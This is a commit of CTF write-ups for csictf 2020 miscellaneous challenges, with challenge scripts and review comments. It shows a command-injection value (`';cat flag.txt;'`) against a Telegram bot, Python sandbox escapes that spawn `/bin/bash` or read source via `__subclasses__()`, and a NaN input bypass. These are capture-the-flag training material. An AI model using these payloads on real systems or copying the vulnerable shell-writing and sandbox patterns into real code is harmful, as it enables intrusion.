Added Miscellaneous Challenges

rishitsaiya 2020-07-31 18:23:33 +05:30
parent 783e212ca7
commit aca8780568
11 changed files with 556 additions and 0 deletions

@ -0,0 +1,34 @@
## BroBot
The main idea finding the flag is just using Bot to get the flag.
#### Step-1:
I tried `/about` to get information about the bot and got this:
```python
CTF - https://ctf.csivit.com/
Our Team - https://ctftime.org/team/77170/
Homepage - https://csivit.com/
Contribute - https://github.com/alias-rahil/speakingbot.git/
CTF Support - https://discord.com/invite/9wHPB2B/
BoT Support - @alias_rahil
```
#### Step-2:
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound.
#### Step-3:
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute.
```bash
fs = open(f"/home/ctf/{update.message.from_user.id}", "w")
fs.write(f"echo '{text}'")
fs.close()
os.system(
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'"
)
```
Then a simple `';cat flag.txt;'` gives us the answer.
#### Step-4:
Finally the flag becomes:
`csictf{ai_will_take_over_the_world}`
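
Review bot: Step-3 shows the bot source but never says why the `';cat flag.txt;'` input works, and the fence around that source is tagged `bash` although the lines are Python (`open`, `os.system`). One sentence would cover it: `fs.write(f"echo '{text}'")` places the user's text inside single quotes in a script that is then run with `sh`, so a quote in the text ends the `echo` argument and whatever follows runs as commands. Naming the fix would round it off, for example quoting the text with `shlex.quote` or feeding it to `espeak` on stdin without generating a shell script. The Step-1 fence is plain bot output rather than Python, and "I linked to the source of the bot" in Step-2 is unclear about who linked what.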

Binary file not shown.

@ -0,0 +1,84 @@
## Escape Plan
The main idea finding the flag is just spawning into a sandbox.
#### Step-1:
When we run `nc chall.csivit.com 30419`, we are greeted with,
```bash
Welcome to cipher decoder, an open-source script in python!
EXAMPLES:
shift_cipher_key('hello', 25)
shift_cipher_bruteforce('hello')
encrypt_vigenere('TEXT', 'KEY')
decrypt_vigenere('DIVD', 'KEY')
Currently supported ciphers:
shift_cipher_key(text, shift)
shift_cipher_bruteforce(text)
encrypt_vigenere(plaintext, key)
decrypt_vigenere(ciphertext, key)
To exit:
exit()
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR!
Hope it helps you!
```
#### Step-2:
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in.
Once in I directly checked, `ls -al`, and I got this:
```bash
total 20
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 .
drwxr-xr-x 1 root root 4096 Jul 26 16:58 ..
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh
```
#### Step-3:
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files:
```bash
COMMIT_EDITMSG
HEAD
config
description
hooks
index
info
logs
objects
packed-refs
refs
```
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied.
#### Step-4:
So, I checked config files by `cat config` and I got this:
```bash
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/alias-rahil/crypto-cli
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
```
#### Step-4:
Now, I got a URL and checked at the given head and got the flag.
<img src="Flag.png">
#### Step-5:
Finally the flag becomes:
`csictf{2077m4y32_h45_35c4p3d}`
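
Review bot: the heading `#### Step-4:` appears twice (once before `cat config`, again before the URL step), so the remaining steps are misnumbered, and the second Step-4 only says the flag was found "at the given head" while the actual result lives in `<img src="Flag.png">`. Renumber the steps, state in text where in the `crypto-cli` repository the flag was found, and give the image alt text. Step-2 would also benefit from a sentence on why the prompt accepted the `eval(...)` expression, and the fences around the service banner, the `.git` listing and the git config are tagged `bash` although none of them is shell.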

@ -0,0 +1,226 @@
## Friends
The main idea finding the flag is just parsing the input smartly.
#### Step-1:
When we download `namo.py`, we are greeted with:
```python
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()
```
#### Step-2:
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end.
```bash
echo nan | nc chall.csivit.com 30425
```
Output:
```bash
Enter a number:
Mitrooon
bhaiyo aur behno "Enter a number"
mann ki baat nambar
agar nambar barabar 1 hai {
bhaiyo aur behno "s"
}
nahi toh agar nambar barabar 13 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 15 hai {
bhaiyo aur behno "5"
}
nahi toh agar nambar barabar 22 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 28 hai {
bhaiyo aur behno "k"
}
nahi toh agar nambar barabar 8 hai {
bhaiyo aur behno "y"
}
nahi toh agar nambar barabar 17 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 9 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 4 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 3 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 20 hai {
bhaiyo aur behno "r"
}
nahi toh agar nambar barabar 12 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 0 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 23 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 27 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 10 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 11 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 7 hai {
bhaiyo aur behno "m"
}
nahi toh agar nambar barabar 25 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 24 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 6 hai {
bhaiyo aur behno "{"
}
nahi toh agar nambar barabar 16 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 18 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 2 hai {
bhaiyo aur behno "i"
}
nahi toh agar nambar barabar 5 hai {
bhaiyo aur behno "f"
}
nahi toh agar nambar barabar 19 hai {
bhaiyo aur behno "g"
}
nahi toh agar nambar barabar 14 hai {
bhaiyo aur behno "1"
}
nahi toh agar nambar barabar 21 hai {
bhaiyo aur behno "3"
}
nahi toh agar nambar barabar 26 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 29 hai {
bhaiyo aur behno "}"
}
nahi toh {
bhaiyo aur behno ""
}
achhe din aa gaye
```
#### Step-3:
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag.
```bash
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo ''
```
This is a 1 liner and we get the flag after this.
#### Step-5:
Finally the flag becomes:
`csictf{my_n4n_15_4_gr34t_c00k}`
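
Review bot: Step-2 says `nan` reaches the `else` branch but not why, which is the whole point of the challenge. Add the reasoning from the listing: `float("nan")` parses, `x < 3 or x > 100` is false for NaN so `exit()` is skipped, and `x == mathStuff(x)` is false because NaN never compares equal, even to itself. The step numbering also jumps from Step-3 to Step-5, the two output fences are tagged `bash` although they hold program output, and the one-liner in Step-3 relies on a literal tab in `s/^\tbhaiyo...` and on the `:a;N;$!ba` loop, so it is worth saying which `sed` it was run with.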

@ -0,0 +1,38 @@
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()
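
Review bot: `x = round(float(input()), 0)` accepts `nan`, and neither the range check `if (x < 3 or x > 100)` nor the final `if x == mathStuff(x)` handles it: every comparison with NaN is false, so `exit()` is skipped and execution falls through to the `else` branch that prints `namo.txt`. If this file is the challenge as distributed, add a header comment saying it is kept unmodified; otherwise reject non-finite input right after parsing with `math.isfinite(x)`. The `math` import is currently unused.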

@ -0,0 +1,51 @@
## Machine Fix
The main idea finding the flag is just understanding the algorithm.
#### Step-1:
After I downloaded `code.py`, I tried to understand the workflow here:
```python
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)
```
#### Step-2:
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total.
So I wrote a simple `flag.py` script to get flag:
```python
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))
```
On running it by `python3 flag.py`
#### Step-3:
Finally the flag becomes:
`csictf{785539772602034710213927792950}`
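
Review bot: Step-2 goes from describing the brute-force loop straight to `flag.py` without showing why n + n//3 + n//9 + ... equals `count`. One sentence is enough: going from n-1 to n changes the base-3 digit at position k exactly when 3^k divides n, so position k contributes floor(N/3^k) changes over 1..N, and `flag(n)` sums those terms. The line "On running it by `python3 flag.py`" is also an unfinished sentence; state what the script printed.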

@ -0,0 +1,21 @@
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)
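
Review bot: the loop `while(n<=523693181734689806809285195318)` runs about 5.2e29 iterations, each doing two base-3 conversions and a digit-by-digit comparison, so the script cannot finish as written. If this is the unmodified challenge file, a header comment saying so, and pointing to `flag.py` for the closed form, would stop readers from trying to run it. The hard-coded bound would also read better as a named constant.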

@ -0,0 +1,8 @@
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))
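
Review bot: `sum` in `flag(n)` shadows the built-in; rename it (for example `total`) and add a one-line comment that the loop computes n + n//3 + n//9 + ..., the number of base-3 digit changes that `code.py` counts. The script prints the bare number, so a comment that the result still has to be wrapped in `csictf{...}` would help.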

Binary file not shown.

@ -0,0 +1,15 @@
## No DIStractions
The main idea finding the flag is getting the flag from Discord Bot.
#### Step-1:
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`.
#### Step-2:
After trying `flag`, `./flag`, etc., it worked on `.flag`.
<img src ="Flag.png">
#### Step-3:
Finally the flag becomes:
`csictf{m0r3_huMaN_than_Y0u}`
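
Review bot: the bot's reply to `.flag` exists only in `<img src ="Flag.png">`, which has no alt text and a stray space before `=`. Quote the reply as text in Step-2 (or at least add alt text) so the step is readable without the image, and say which server's misc channel is meant in Step-1.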

@ -0,0 +1,79 @@
## Prison Break
The main idea finding the flag is just escaping Python Sandbox.
#### Step-1:
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox.
I tried various commands like flag and ctf and all, but nothing worked.
#### Step-2:
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/
#### Step-3:
There I got this 1 liner to escape the sandbox.
**Payload:**
```python
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read())
```
I got the source code, which had the flag.
```python
#!/usr/bin/python
import sys
class Sandbox(object):
def execute(self, code_string):
exec(code_string)
sys.stdout.flush()
sandbox = Sandbox()
_raw_input = raw_input
main = sys.modules["__main__"].__dict__
orig_builtins = main["__builtins__"].__dict__
builtins_whitelist = set((
#exceptions
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception',
#constants
'False', 'None', 'True',
#types
'basestring', 'bytearray', 'bytes', 'complex', 'dict',
#functions
'abs', 'bin', 'dir', 'help'
# blocked: eval, execfile, exit, file, quit, reload, import, etc.
))
for builtin in orig_builtins.keys():
if builtin not in builtins_whitelist:
del orig_builtins[builtin]
print("Find the flag.")
sys.stdout.flush()
def flag_function():
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}"
while 1:
try:
sys.stdout.write(">>> ")
sys.stdout.flush()
code = _raw_input()
sandbox.execute(code)
except Exception:
print("You have encountered an error.")
sys.stdout.flush()
```
#### Step-4:
Finally the flag becomes:
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}`
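
Review bot: the payload in Step-3 uses the bare index `[40]` with no explanation; say which class `().__class__.__bases__[0].__subclasses__()[40]` resolves to on this target and that the position depends on the interpreter build. The listing also deserves one sentence on the lesson for defenders: deleting names from `__builtins__` (the `builtins_whitelist` loop) does not remove types that are reachable from any object, which is why the read of `__file__` succeeded even though `file` is listed as blocked. Smaller points: "we get this a python sandbox" in Step-1 needs fixing, and the hint URL has a doubled slash in `pwn//linux`.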